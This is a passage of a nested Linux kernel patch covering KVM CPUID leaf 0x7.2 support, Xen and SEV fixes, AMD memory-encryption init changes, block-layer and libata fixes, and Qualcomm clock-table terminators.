++		F(INTEL_PSFD) | F(IPRED_CTRL) | F(RRSBA_CTRL) | F(DDPD_U) |
++		F(BHI_CTRL) | F(MCDT_NO)
++	);
++
+ 	kvm_cpu_cap_mask(CPUID_D_1_EAX,
+ 		F(XSAVEOPT) | F(XSAVEC) | F(XGETBV1) | F(XSAVES) | f_xfd
+ 	);
+ 
+-	kvm_cpu_cap_init_scattered(CPUID_12_EAX,
++	kvm_cpu_cap_init_kvm_defined(CPUID_12_EAX,
+ 		SF(SGX1) | SF(SGX2)
+ 	);
+ 
+@@ -902,13 +907,13 @@ static inline int __do_cpuid_func(struct kvm_cpuid_array *array, u32 function)
+ 		break;
+ 	/* function 7 has additional index. */
+ 	case 7:
+-		entry->eax = min(entry->eax, 1u);
++		max_idx = entry->eax = min(entry->eax, 2u);
+ 		cpuid_entry_override(entry, CPUID_7_0_EBX);
+ 		cpuid_entry_override(entry, CPUID_7_ECX);
+ 		cpuid_entry_override(entry, CPUID_7_EDX);
+ 
+-		/* KVM only supports 0x7.0 and 0x7.1, capped above via min(). */
+-		if (entry->eax == 1) {
++		/* KVM only supports up to 0x7.2, capped above via min(). */
++		if (max_idx >= 1) {
+ 			entry = do_host_cpuid(array, function, 1);
+ 			if (!entry)
+ 				goto out;
+@@ -918,6 +923,16 @@ static inline int __do_cpuid_func(struct kvm_cpuid_array *array, u32 function)
+ 			entry->ecx = 0;
+ 			entry->edx = 0;
+ 		}
++		if (max_idx >= 2) {
++			entry = do_host_cpuid(array, function, 2);
++			if (!entry)
++				goto out;
++
++			cpuid_entry_override(entry, CPUID_7_2_EDX);
++			entry->ecx = 0;
++			entry->ebx = 0;
++			entry->eax = 0;
++		}
+ 		break;
+ 	case 0xa: { /* Architectural Performance Monitoring */
+ 		union cpuid10_eax eax;
+diff --git a/arch/x86/kvm/lapic.c b/arch/x86/kvm/lapic.c
+index edcf45e312b99..bfeafe4855528 100644
+--- a/arch/x86/kvm/lapic.c
++++ b/arch/x86/kvm/lapic.c
+@@ -40,6 +40,7 @@
+ #include "ioapic.h"
+ #include "trace.h"
+ #include "x86.h"
++#include "xen.h"
+ #include "cpuid.h"
+ #include "hyperv.h"
+ 
+@@ -338,8 +339,10 @@ static inline void apic_set_spiv(struct kvm_lapic *apic, u32 val)
+ 	}
+ 
+ 	/* Check if there are APF page ready requests pending */
+-	if (enabled)
++	if (enabled) {
+ 		kvm_make_request(KVM_REQ_APF_READY, apic->vcpu);
++		kvm_xen_sw_enable_lapic(apic->vcpu);
++	}
+ }
+ 
+ static inline void kvm_apic_set_xapic_id(struct kvm_lapic *apic, u8 id)
+diff --git a/arch/x86/kvm/reverse_cpuid.h b/arch/x86/kvm/reverse_cpuid.h
+index 7eeade35a425b..7c8e2b20a13b0 100644
+--- a/arch/x86/kvm/reverse_cpuid.h
++++ b/arch/x86/kvm/reverse_cpuid.h
+@@ -7,23 +7,44 @@
+ #include <asm/cpufeatures.h>
+ 
+ /*
+- * Hardware-defined CPUID leafs that are scattered in the kernel, but need to
+- * be directly used by KVM.  Note, these word values conflict with the kernel's
+- * "bug" caps, but KVM doesn't use those.
++ * Hardware-defined CPUID leafs that are either scattered by the kernel or are
++ * unknown to the kernel, but need to be directly used by KVM.  Note, these
++ * word values conflict with the kernel's "bug" caps, but KVM doesn't use those.
+  */
+ enum kvm_only_cpuid_leafs {
+ 	CPUID_12_EAX	 = NCAPINTS,
++	CPUID_7_2_EDX,
+ 	NR_KVM_CPU_CAPS,
+ 
+ 	NKVMCAPINTS = NR_KVM_CPU_CAPS - NCAPINTS,
+ };
+ 
++/*
++ * Define a KVM-only feature flag.
++ *
++ * For features that are scattered by cpufeatures.h, __feature_translate() also
++ * needs to be updated to translate the kernel-defined feature into the
++ * KVM-defined feature.
++ *
++ * For features that are 100% KVM-only, i.e. not defined by cpufeatures.h,
++ * forego the intermediate KVM_X86_FEATURE and directly define X86_FEATURE_* so
++ * that X86_FEATURE_* can be used in KVM.  No __feature_translate() handling is
++ * needed in this case.
++ */
+ #define KVM_X86_FEATURE(w, f)		((w)*32 + (f))
+ 
+ /* Intel-defined SGX sub-features, CPUID level 0x12 (EAX). */
+ #define KVM_X86_FEATURE_SGX1		KVM_X86_FEATURE(CPUID_12_EAX, 0)
+ #define KVM_X86_FEATURE_SGX2		KVM_X86_FEATURE(CPUID_12_EAX, 1)
+ 
++/* Intel-defined sub-features, CPUID level 0x00000007:2 (EDX) */
++#define X86_FEATURE_INTEL_PSFD		KVM_X86_FEATURE(CPUID_7_2_EDX, 0)
++#define X86_FEATURE_IPRED_CTRL		KVM_X86_FEATURE(CPUID_7_2_EDX, 1)
++#define KVM_X86_FEATURE_RRSBA_CTRL	KVM_X86_FEATURE(CPUID_7_2_EDX, 2)
++#define X86_FEATURE_DDPD_U		KVM_X86_FEATURE(CPUID_7_2_EDX, 3)
++#define X86_FEATURE_BHI_CTRL		KVM_X86_FEATURE(CPUID_7_2_EDX, 4)
++#define X86_FEATURE_MCDT_NO		KVM_X86_FEATURE(CPUID_7_2_EDX, 5)
++
+ struct cpuid_reg {
+ 	u32 function;
+ 	u32 index;
+@@ -49,6 +70,7 @@ static const struct cpuid_reg reverse_cpuid[] = {
+ 	[CPUID_12_EAX]        = {0x00000012, 0, CPUID_EAX},
+ 	[CPUID_8000_001F_EAX] = {0x8000001f, 0, CPUID_EAX},
+ 	[CPUID_8000_0021_EAX] = {0x80000021, 0, CPUID_EAX},
++	[CPUID_7_2_EDX]       = {         7, 2, CPUID_EDX},
+ };
+ 
+ /*
+@@ -75,12 +97,16 @@ static __always_inline void reverse_cpuid_check(unsigned int x86_leaf)
+  */
+ static __always_inline u32 __feature_translate(int x86_feature)
+ {
+-	if (x86_feature == X86_FEATURE_SGX1)
+-		return KVM_X86_FEATURE_SGX1;
+-	else if (x86_feature == X86_FEATURE_SGX2)
+-		return KVM_X86_FEATURE_SGX2;
++#define KVM_X86_TRANSLATE_FEATURE(f)	\
++	case X86_FEATURE_##f: return KVM_X86_FEATURE_##f
+ 
+-	return x86_feature;
++	switch (x86_feature) {
++	KVM_X86_TRANSLATE_FEATURE(SGX1);
++	KVM_X86_TRANSLATE_FEATURE(SGX2);
++	KVM_X86_TRANSLATE_FEATURE(RRSBA_CTRL);
++	default:
++		return x86_feature;
++	}
+ }
+ 
+ static __always_inline u32 __feature_leaf(int x86_feature)
+diff --git a/arch/x86/kvm/svm/sev.c b/arch/x86/kvm/svm/sev.c
+index 3060fe4e9731a..3dc0ee1fe9db9 100644
+--- a/arch/x86/kvm/svm/sev.c
++++ b/arch/x86/kvm/svm/sev.c
+@@ -1958,20 +1958,22 @@ int sev_mem_enc_register_region(struct kvm *kvm,
+ 		goto e_free;
+ 	}
+ 
+-	region->uaddr = range->addr;
+-	region->size = range->size;
+-
+-	list_add_tail(&region->list, &sev->regions_list);
+-	mutex_unlock(&kvm->lock);
+-
+ 	/*
+ 	 * The guest may change the memory encryption attribute from C=0 -> C=1
+ 	 * or vice versa for this memory range. Lets make sure caches are
+ 	 * flushed to ensure that guest data gets written into memory with
+-	 * correct C-bit.
++	 * correct C-bit.  Note, this must be done before dropping kvm->lock,
++	 * as region and its array of pages can be freed by a different task
++	 * once kvm->lock is released.
+ 	 */
+ 	sev_clflush_pages(region->pages, region->npages);
+ 
++	region->uaddr = range->addr;
++	region->size = range->size;
++
++	list_add_tail(&region->list, &sev->regions_list);
++	mutex_unlock(&kvm->lock);
++
+ 	return ret;
+ 
+ e_free:
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index 688bc7b72eb66..0e6e63a8f0949 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -7758,6 +7758,16 @@ static int emulator_cmpxchg_emulated(struct x86_emulate_ctxt *ctxt,
+ 
+ 	if (r < 0)
+ 		return X86EMUL_UNHANDLEABLE;
++
++	/*
++	 * Mark the page dirty _before_ checking whether or not the CMPXCHG was
++	 * successful, as the old value is written back on failure.  Note, for
++	 * live migration, this is unnecessarily conservative as CMPXCHG writes
++	 * back the original value and the access is atomic, but KVM's ABI is
++	 * that all writes are dirty logged, regardless of the value written.
++	 */
++	kvm_vcpu_mark_page_dirty(vcpu, gpa_to_gfn(gpa));
++
+ 	if (r)
+ 		return X86EMUL_CMPXCHG_FAILED;
+ 
+diff --git a/arch/x86/kvm/xen.c b/arch/x86/kvm/xen.c
+index a58a426e6b1c0..684a39df60d9e 100644
+--- a/arch/x86/kvm/xen.c
++++ b/arch/x86/kvm/xen.c
+@@ -314,7 +314,7 @@ void kvm_xen_update_runstate_guest(struct kvm_vcpu *v, int state)
+ 	mark_page_dirty_in_slot(v->kvm, gpc->memslot, gpc->gpa >> PAGE_SHIFT);
+ }
+ 
+-static void kvm_xen_inject_vcpu_vector(struct kvm_vcpu *v)
++void kvm_xen_inject_vcpu_vector(struct kvm_vcpu *v)
+ {
+ 	struct kvm_lapic_irq irq = { };
+ 	int r;
+diff --git a/arch/x86/kvm/xen.h b/arch/x86/kvm/xen.h
+index 532a535a9e99f..500d9593a5a38 100644
+--- a/arch/x86/kvm/xen.h
++++ b/arch/x86/kvm/xen.h
+@@ -16,6 +16,7 @@ extern struct static_key_false_deferred kvm_xen_enabled;
+ 
+ int __kvm_xen_has_interrupt(struct kvm_vcpu *vcpu);
+ void kvm_xen_inject_pending_events(struct kvm_vcpu *vcpu);
++void kvm_xen_inject_vcpu_vector(struct kvm_vcpu *vcpu);
+ int kvm_xen_vcpu_set_attr(struct kvm_vcpu *vcpu, struct kvm_xen_vcpu_attr *data);
+ int kvm_xen_vcpu_get_attr(struct kvm_vcpu *vcpu, struct kvm_xen_vcpu_attr *data);
+ int kvm_xen_hvm_set_attr(struct kvm *kvm, struct kvm_xen_hvm_attr *data);
+@@ -33,6 +34,19 @@ int kvm_xen_setup_evtchn(struct kvm *kvm,
+ 			 struct kvm_kernel_irq_routing_entry *e,
+ 			 const struct kvm_irq_routing_entry *ue);
+ 
++static inline void kvm_xen_sw_enable_lapic(struct kvm_vcpu *vcpu)
++{
++	/*
++	 * The local APIC is being enabled. If the per-vCPU upcall vector is
++	 * set and the vCPU's evtchn_upcall_pending flag is set, inject the
++	 * interrupt.
++	 */
++	if (static_branch_unlikely(&kvm_xen_enabled.key) &&
++	    vcpu->arch.xen.vcpu_info_cache.active &&
++	    vcpu->arch.xen.upcall_vector && __kvm_xen_has_interrupt(vcpu))
++		kvm_xen_inject_vcpu_vector(vcpu);
++}
++
+ static inline bool kvm_xen_msr_enabled(struct kvm *kvm)
+ {
+ 	return static_branch_unlikely(&kvm_xen_enabled.key) &&
+@@ -98,6 +112,10 @@ static inline void kvm_xen_destroy_vcpu(struct kvm_vcpu *vcpu)
+ {
+ }
+ 
++static inline void kvm_xen_sw_enable_lapic(struct kvm_vcpu *vcpu)
++{
++}
++
+ static inline bool kvm_xen_msr_enabled(struct kvm *kvm)
+ {
+ 	return false;
+diff --git a/arch/x86/mm/mem_encrypt_amd.c b/arch/x86/mm/mem_encrypt_amd.c
+index 3e93af083e037..d4957eefef267 100644
+--- a/arch/x86/mm/mem_encrypt_amd.c
++++ b/arch/x86/mm/mem_encrypt_amd.c
+@@ -513,6 +513,24 @@ void __init sme_early_init(void)
+ 	 */
+ 	if (sev_status & MSR_AMD64_SEV_ENABLED)
+ 		ia32_disable();
++
++	/*
++	 * Override init functions that scan the ROM region in SEV-SNP guests,
++	 * as this memory is not pre-validated and would thus cause a crash.
++	 */
++	if (sev_status & MSR_AMD64_SEV_SNP_ENABLED) {
++		x86_init.mpparse.find_smp_config = x86_init_noop;
++		x86_init.pci.init_irq = x86_init_noop;
++		x86_init.resources.probe_roms = x86_init_noop;
++
++		/*
++		 * DMI setup behavior for SEV-SNP guests depends on
++		 * efi_enabled(EFI_CONFIG_TABLES), which hasn't been
++		 * parsed yet. snp_dmi_setup() will run after that
++		 * parsing has happened.
++		 */
++		x86_init.resources.dmi_setup = snp_dmi_setup;
++	}
+ }
+ 
+ void __init mem_encrypt_free_decrypted_mem(void)
+diff --git a/arch/x86/mm/mem_encrypt_identity.c b/arch/x86/mm/mem_encrypt_identity.c
+index a11a6ebbf5ecf..06ccbd36e8dcd 100644
+--- a/arch/x86/mm/mem_encrypt_identity.c
++++ b/arch/x86/mm/mem_encrypt_identity.c
+@@ -97,7 +97,6 @@ static char sme_workarea[2 * PMD_PAGE_SIZE] __section(".init.scratch");
+ 
+ static char sme_cmdline_arg[] __initdata = "mem_encrypt";
+ static char sme_cmdline_on[]  __initdata = "on";
+-static char sme_cmdline_off[] __initdata = "off";
+ 
+ static void __init sme_clear_pgd(struct sme_populate_pgd_data *ppd)
+ {
+@@ -305,7 +304,8 @@ void __init sme_encrypt_kernel(struct boot_params *bp)
+ 	 * instrumentation or checking boot_cpu_data in the cc_platform_has()
+ 	 * function.
+ 	 */
+-	if (!sme_get_me_mask() || sev_status & MSR_AMD64_SEV_ENABLED)
++	if (!sme_get_me_mask() ||
++	    RIP_REL_REF(sev_status) & MSR_AMD64_SEV_ENABLED)
+ 		return;
+ 
+ 	/*
+@@ -504,7 +504,7 @@ void __init sme_encrypt_kernel(struct boot_params *bp)
+ 
+ void __init sme_enable(struct boot_params *bp)
+ {
+-	const char *cmdline_ptr, *cmdline_arg, *cmdline_on, *cmdline_off;
++	const char *cmdline_ptr, *cmdline_arg, *cmdline_on;
+ 	unsigned int eax, ebx, ecx, edx;
+ 	unsigned long feature_mask;
+ 	unsigned long me_mask;
+@@ -542,11 +542,11 @@ void __init sme_enable(struct boot_params *bp)
+ 	me_mask = 1UL << (ebx & 0x3f);
+ 
+ 	/* Check the SEV MSR whether SEV or SME is enabled */
+-	sev_status   = __rdmsr(MSR_AMD64_SEV);
+-	feature_mask = (sev_status & MSR_AMD64_SEV_ENABLED) ? AMD_SEV_BIT : AMD_SME_BIT;
++	RIP_REL_REF(sev_status) = msr = __rdmsr(MSR_AMD64_SEV);
++	feature_mask = (msr & MSR_AMD64_SEV_ENABLED) ? AMD_SEV_BIT : AMD_SME_BIT;
+ 
+ 	/* The SEV-SNP CC blob should never be present unless SEV-SNP is enabled. */
+-	if (snp && !(sev_status & MSR_AMD64_SEV_SNP_ENABLED))
++	if (snp && !(msr & MSR_AMD64_SEV_SNP_ENABLED))
+ 		snp_abort();
+ 
+ 	/* Check if memory encryption is enabled */
+@@ -572,7 +572,6 @@ void __init sme_enable(struct boot_params *bp)
+ 			return;
+ 	} else {
+ 		/* SEV state cannot be controlled by a command line option */
+-		sme_me_mask = me_mask;
+ 		goto out;
+ 	}
+ 
+@@ -587,28 +586,17 @@ void __init sme_enable(struct boot_params *bp)
+ 	asm ("lea sme_cmdline_on(%%rip), %0"
+ 	     : "=r" (cmdline_on)
+ 	     : "p" (sme_cmdline_on));
+-	asm ("lea sme_cmdline_off(%%rip), %0"
+-	     : "=r" (cmdline_off)
+-	     : "p" (sme_cmdline_off));
+-
+-	if (IS_ENABLED(CONFIG_AMD_MEM_ENCRYPT_ACTIVE_BY_DEFAULT))
+-		sme_me_mask = me_mask;
+ 
+ 	cmdline_ptr = (const char *)((u64)bp->hdr.cmd_line_ptr |
+ 				     ((u64)bp->ext_cmd_line_ptr << 32));
+ 
+-	if (cmdline_find_option(cmdline_ptr, cmdline_arg, buffer, sizeof(buffer)) < 0)
+-		goto out;
+-
+-	if (!strncmp(buffer, cmdline_on, sizeof(buffer)))
+-		sme_me_mask = me_mask;
+-	else if (!strncmp(buffer, cmdline_off, sizeof(buffer)))
+-		sme_me_mask = 0;
++	if (cmdline_find_option(cmdline_ptr, cmdline_arg, buffer, sizeof(buffer)) < 0 ||
++	    strncmp(buffer, cmdline_on, sizeof(buffer)))
++		return;
+ 
+ out:
+-	if (sme_me_mask) {
+-		physical_mask &= ~sme_me_mask;
+-		cc_set_vendor(CC_VENDOR_AMD);
+-		cc_set_mask(sme_me_mask);
+-	}
++	RIP_REL_REF(sme_me_mask) = me_mask;
++	physical_mask &= ~me_mask;
++	cc_vendor = CC_VENDOR_AMD;
++	cc_set_mask(me_mask);
+ }
+diff --git a/block/bio.c b/block/bio.c
+index 74c2818c7ec99..3318e0022fdfd 100644
+--- a/block/bio.c
++++ b/block/bio.c
+@@ -1112,19 +1112,16 @@ void __bio_release_pages(struct bio *bio, bool mark_dirty)
+ 	struct folio_iter fi;
+ 
+ 	bio_for_each_folio_all(fi, bio) {
+-		struct page *page;
+-		size_t done = 0;
++		size_t nr_pages;
+ 
+ 		if (mark_dirty) {
+ 			folio_lock(fi.folio);
+ 			folio_mark_dirty(fi.folio);
+ 			folio_unlock(fi.folio);
+ 		}
+-		page = folio_page(fi.folio, fi.offset / PAGE_SIZE);
+-		do {
+-			folio_put(fi.folio);
+-			done += PAGE_SIZE;
+-		} while (done < fi.length);
++		nr_pages = (fi.offset + fi.length - 1) / PAGE_SIZE -
++			   fi.offset / PAGE_SIZE + 1;
++		folio_put_refs(fi.folio, nr_pages);
+ 	}
+ }
+ EXPORT_SYMBOL_GPL(__bio_release_pages);
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index 7ed6b9469f979..e1b12f3d54bd4 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -675,6 +675,22 @@ struct request *blk_mq_alloc_request_hctx(struct request_queue *q,
+ }
+ EXPORT_SYMBOL_GPL(blk_mq_alloc_request_hctx);
+ 
++static void blk_mq_finish_request(struct request *rq)
++{
++	struct request_queue *q = rq->q;
++
++	if ((rq->rq_flags & RQF_ELVPRIV) &&
++	    q->elevator->type->ops.finish_request) {
++		q->elevator->type->ops.finish_request(rq);
++		/*
++		 * For postflush request that may need to be
++		 * completed twice, we should clear this flag
++		 * to avoid double finish_request() on the rq.
++		 */
++		rq->rq_flags &= ~RQF_ELVPRIV;
++	}
++}
++
+ static void __blk_mq_free_request(struct request *rq)
+ {
+ 	struct request_queue *q = rq->q;
+@@ -701,9 +717,7 @@ void blk_mq_free_request(struct request *rq)
+ {
+ 	struct request_queue *q = rq->q;
+ 
+-	if ((rq->rq_flags & RQF_ELVPRIV) &&
+-	    q->elevator->type->ops.finish_request)
+-		q->elevator->type->ops.finish_request(rq);
++	blk_mq_finish_request(rq);
+ 
+ 	if (unlikely(laptop_mode && !blk_rq_is_passthrough(rq)))
+ 		laptop_io_completion(q->disk->bdi);
+@@ -747,16 +761,11 @@ static void req_bio_endio(struct request *rq, struct bio *bio,
+ 		/*
+ 		 * Partial zone append completions cannot be supported as the
+ 		 * BIO fragments may end up not being written sequentially.
+-		 * For such case, force the completed nbytes to be equal to
+-		 * the BIO size so that bio_advance() sets the BIO remaining
+-		 * size to 0 and we end up calling bio_endio() before returning.
+ 		 */
+-		if (bio->bi_iter.bi_size != nbytes) {
++		if (bio->bi_iter.bi_size != nbytes)
+ 			bio->bi_status = BLK_STS_IOERR;
+-			nbytes = bio->bi_iter.bi_size;
+-		} else {
++		else
+ 			bio->bi_iter.bi_sector = rq->__sector;
+-		}
+ 	}
+ 
+ 	bio_advance(bio, nbytes);
+@@ -1025,6 +1034,8 @@ inline void __blk_mq_end_request(struct request *rq, blk_status_t error)
+ 	if (blk_mq_need_time_stamp(rq))
+ 		__blk_mq_end_request_acct(rq, ktime_get_ns());
+ 
++	blk_mq_finish_request(rq);
++
+ 	if (rq->end_io) {
+ 		rq_qos_done(rq->q, rq);
+ 		if (rq->end_io(rq, error) == RQ_END_IO_FREE)
+@@ -1079,6 +1090,8 @@ void blk_mq_end_request_batch(struct io_comp_batch *iob)
+ 		if (iob->need_ts)
+ 			__blk_mq_end_request_acct(rq, now);
+ 
++		blk_mq_finish_request(rq);
++
+ 		rq_qos_done(rq->q, rq);
+ 
+ 		/*
+diff --git a/block/blk-settings.c b/block/blk-settings.c
+index bbca4ce77a2d3..c702f408bbc0a 100644
+--- a/block/blk-settings.c
++++ b/block/blk-settings.c
+@@ -680,6 +680,10 @@ int blk_stack_limits(struct queue_limits *t, struct queue_limits *b,
+ 	t->zone_write_granularity = max(t->zone_write_granularity,
+ 					b->zone_write_granularity);
+ 	t->zoned = max(t->zoned, b->zoned);
++	if (!t->zoned) {
++		t->zone_write_granularity = 0;
++		t->max_zone_append_sectors = 0;
++	}
+ 	return ret;
+ }
+ EXPORT_SYMBOL(blk_stack_limits);
+diff --git a/block/mq-deadline.c b/block/mq-deadline.c
+index 55e26065c2e27..f10c2a0d18d41 100644
+--- a/block/mq-deadline.c
++++ b/block/mq-deadline.c
+@@ -622,9 +622,8 @@ static void dd_depth_updated(struct blk_mq_hw_ctx *hctx)
+ 	struct request_queue *q = hctx->queue;
+ 	struct deadline_data *dd = q->elevator->elevator_data;
+ 	struct blk_mq_tags *tags = hctx->sched_tags;
+-	unsigned int shift = tags->bitmap_tags.sb.shift;
+ 
+-	dd->async_depth = max(1U, 3 * (1U << shift)  / 4);
++	dd->async_depth = max(1UL, 3 * q->nr_requests / 4);
+ 
+ 	sbitmap_queue_min_shallow_depth(&tags->bitmap_tags, dd->async_depth);
+ }
+diff --git a/drivers/accessibility/speakup/synth.c b/drivers/accessibility/speakup/synth.c
+index eea2a2fa4f015..45f9061031338 100644
+--- a/drivers/accessibility/speakup/synth.c
++++ b/drivers/accessibility/speakup/synth.c
+@@ -208,8 +208,10 @@ void spk_do_flush(void)
+ 	wake_up_process(speakup_task);
+ }
+ 
+-void synth_write(const char *buf, size_t count)
++void synth_write(const char *_buf, size_t count)
+ {
++	const unsigned char *buf = (const unsigned char *) _buf;
++
+ 	while (count--)
+ 		synth_buffer_add(*buf++);
+ 	synth_start();
+diff --git a/drivers/ata/ahci.c b/drivers/ata/ahci.c
+index 1790a2ecb9fac..17119e8dc8c30 100644
+--- a/drivers/ata/ahci.c
++++ b/drivers/ata/ahci.c
+@@ -671,11 +671,6 @@ MODULE_PARM_DESC(mobile_lpm_policy, "Default LPM policy for mobile chipsets");
+ static void ahci_pci_save_initial_config(struct pci_dev *pdev,
+ 					 struct ahci_host_priv *hpriv)
+ {
+-	if (pdev->vendor == PCI_VENDOR_ID_ASMEDIA && pdev->device == 0x1166) {
+-		dev_info(&pdev->dev, "ASM1166 has only six ports\n");
+-		hpriv->saved_port_map = 0x3f;
+-	}
+-
+ 	if (pdev->vendor == PCI_VENDOR_ID_JMICRON && pdev->device == 0x2361) {
+ 		dev_info(&pdev->dev, "JMB361 has only one port\n");
+ 		hpriv->saved_port_map = 1;
+diff --git a/drivers/ata/libata-eh.c b/drivers/ata/libata-eh.c
+index 1eaaf01418ea7..b8034d194078d 100644
+--- a/drivers/ata/libata-eh.c
++++ b/drivers/ata/libata-eh.c
+@@ -711,8 +711,10 @@ void ata_scsi_port_error_handler(struct Scsi_Host *host, struct ata_port *ap)
+ 					ehc->saved_ncq_enabled |= 1 << devno;
+ 
+ 				/* If we are resuming, wake up the device */
+-				if (ap->pflags & ATA_PFLAG_RESUMING)
++				if (ap->pflags & ATA_PFLAG_RESUMING) {
++					dev->flags |= ATA_DFLAG_RESUMING;
+ 					ehc->i.dev_action[devno] |= ATA_EH_SET_ACTIVE;
++				}
+ 			}
+ 		}
+ 
+@@ -3089,6 +3091,7 @@ static int ata_eh_revalidate_and_attach(struct ata_link *link,
+ 	return 0;
+ 
+  err:
++	dev->flags &= ~ATA_DFLAG_RESUMING;
+ 	*r_failed_dev = dev;
+ 	return rc;
+ }
+diff --git a/drivers/ata/libata-scsi.c b/drivers/ata/libata-scsi.c
+index a9da2f05e6297..a09548630fc8b 100644
+--- a/drivers/ata/libata-scsi.c
++++ b/drivers/ata/libata-scsi.c
+@@ -4652,6 +4652,7 @@ void ata_scsi_dev_rescan(struct work_struct *work)
+ 	struct ata_link *link;
+ 	struct ata_device *dev;
+ 	unsigned long flags;
++	bool do_resume;
+ 	int ret = 0;
+ 
+ 	mutex_lock(&ap->scsi_scan_mutex);
+@@ -4673,7 +4674,15 @@ void ata_scsi_dev_rescan(struct work_struct *work)
+ 			if (scsi_device_get(sdev))
+ 				continue;
+ 
++			do_resume = dev->flags & ATA_DFLAG_RESUMING;
++
+ 			spin_unlock_irqrestore(ap->lock, flags);
++			if (do_resume) {
++				ret = scsi_resume_device(sdev);
++				if (ret == -EWOULDBLOCK)
++					goto unlock;
++				dev->flags &= ~ATA_DFLAG_RESUMING;
++			}
+ 			ret = scsi_rescan_device(sdev);
+ 			scsi_device_put(sdev);
+ 			spin_lock_irqsave(ap->lock, flags);
+diff --git a/drivers/base/power/wakeirq.c b/drivers/base/power/wakeirq.c
+index afd094dec5ca3..ca0c092ba47fb 100644
+--- a/drivers/base/power/wakeirq.c
++++ b/drivers/base/power/wakeirq.c
+@@ -362,8 +362,10 @@ void dev_pm_enable_wake_irq_complete(struct device *dev)
+ 		return;
+ 
+ 	if (wirq->status & WAKE_IRQ_DEDICATED_MANAGED &&
+-	    wirq->status & WAKE_IRQ_DEDICATED_REVERSE)
++	    wirq->status & WAKE_IRQ_DEDICATED_REVERSE) {
+ 		enable_irq(wirq->irq);
++		wirq->status |= WAKE_IRQ_DEDICATED_ENABLED;
++	}
+ }
+ 
+ /**
+diff --git a/drivers/clk/qcom/gcc-ipq6018.c b/drivers/clk/qcom/gcc-ipq6018.c
+index 4c5c7a8f41d08..b9844e41cf99d 100644
+--- a/drivers/clk/qcom/gcc-ipq6018.c
++++ b/drivers/clk/qcom/gcc-ipq6018.c
+@@ -1557,6 +1557,7 @@ static struct clk_regmap_div nss_ubi0_div_clk_src = {
+ 
+ static const struct freq_tbl ftbl_pcie_aux_clk_src[] = {
+ 	F(24000000, P_XO, 1, 0, 0),
++	{ }
+ };
+ 
+ static const struct clk_parent_data gcc_xo_gpll0_core_pi_sleep_clk[] = {
+@@ -1737,6 +1738,7 @@ static const struct freq_tbl ftbl_sdcc_ice_core_clk_src[] = {
+ 	F(160000000, P_GPLL0, 5, 0, 0),
+ 	F(216000000, P_GPLL6, 5, 0, 0),
+ 	F(308570000, P_GPLL6, 3.5, 0, 0),
++	{ }
+ };
+ 
+ static const struct clk_parent_data gcc_xo_gpll0_gpll6_gpll0_div2[] = {
+diff --git a/drivers/clk/qcom/gcc-ipq8074.c b/drivers/clk/qcom/gcc-ipq8074.c
+index b2e83b38976e5..b52c923a2fbca 100644
+--- a/drivers/clk/qcom/gcc-ipq8074.c
++++ b/drivers/clk/qcom/gcc-ipq8074.c
+@@ -973,6 +973,7 @@ static struct clk_rcg2 pcie0_axi_clk_src = {
+ 
+ static const struct freq_tbl ftbl_pcie_aux_clk_src[] = {
+ 	F(19200000, P_XO, 1, 0, 0),
++	{ }
+ };
+ 
+ static struct clk_rcg2 pcie0_aux_clk_src = {
+@@ -1078,6 +1079,7 @@ static const struct freq_tbl ftbl_sdcc_ice_core_clk_src[] = {
+ 	F(19200000, P_XO, 1, 0, 0),
+ 	F(160000000, P_GPLL0, 5, 0, 0),
+ 	F(308570000, P_GPLL6, 3.5, 0, 0),
++	{ }
+ };
+ 
+ static struct clk_rcg2 sdcc1_ice_core_clk_src = {
+diff --git a/drivers/clk/qcom/gcc-sdm845.c b/drivers/clk/qcom/gcc-sdm845.c
+index 6af08e0ca8475..ef15e8f114027 100644
+--- a/drivers/clk/qcom/gcc-sdm845.c
++++ b/drivers/clk/qcom/gcc-sdm845.c
+@@ -4038,3 +4038,4 @@ module_exit(gcc_sdm845_exit);
+ MODULE_DESCRIPTION("QTI GCC SDM845 Driver");
+ MODULE_LICENSE("GPL v2");
+ MODULE_ALIAS("platform:gcc-sdm845");
++MODULE_SOFTDEP("pre: rpmhpd");
+diff --git a/drivers/clk/qcom/mmcc-apq8084.c b/drivers/clk/qcom/mmcc-apq8084.c
+index e9f9713591558..5f373c10ec6ee 100644
+--- a/drivers/clk/qcom/mmcc-apq8084.c
++++ b/drivers/clk/qcom/mmcc-apq8084.c
+@@ -334,6 +334,7 @@ static struct freq_tbl ftbl_mmss_axi_clk[] = {
+ 	F(333430000, P_MMPLL1, 3.5, 0, 0),
+ 	F(400000000, P_MMPLL0, 2, 0, 0),
+ 	F(466800000, P_MMPLL1, 2.5, 0, 0),
++	{ }
+ };
+ 
+ static struct clk_rcg2 mmss_axi_clk_src = {
+@@ -358,6 +359,7 @@ static struct freq_tbl ftbl_ocmemnoc_clk[] = {
+ 	F(150000000, P_GPLL0, 4, 0, 0),
+ 	F(228570000, P_MMPLL0, 3.5, 0, 0),
+ 	F(320000000, P_MMPLL0, 2.5, 0, 0),
++	{ }
+ };
+ 
+ static struct clk_rcg2 ocmemnoc_clk_src = {
+diff --git a/drivers/clk/qcom/mmcc-msm8974.c b/drivers/clk/qcom/mmcc-msm8974.c
+index 17ed52046170a..eb2b0e2200d23 100644
+--- a/drivers/clk/qcom/mmcc-msm8974.c
++++ b/drivers/clk/qcom/mmcc-msm8974.c
+@@ -279,6 +279,7 @@ static struct freq_tbl ftbl_mmss_axi_clk[] = {
+ 	F(291750000, P_MMPLL1, 4, 0, 0),
+ 	F(400000000, P_MMPLL0, 2, 0, 0),
+ 	F(466800000, P_MMPLL1, 2.5, 0, 0),
++	{ }
+ };
+ 
+ static struct clk_rcg2 mmss_axi_clk_src = {
+@@ -303,6 +304,7 @@ static struct freq_tbl ftbl_ocmemnoc_clk[] = {
+ 	F(150000000, P_GPLL0, 4, 0, 0),
+ 	F(291750000, P_MMPLL1, 4, 0, 0),
+ 	F(400000000, P_MMPLL0, 2, 0, 0),
++	{ }
+ };
+ 
+ static struct clk_rcg2 ocmemnoc_clk_src = {
+diff --git a/drivers/clocksource/arm_global_timer.c b/drivers/clocksource/arm_global_timer.c
+index 44a61dc6f9320..e1c773bb55359 100644
+--- a/drivers/clocksource/arm_global_timer.c
++++ b/drivers/clocksource/arm_global_timer.c
+@@ -32,7 +32,7 @@
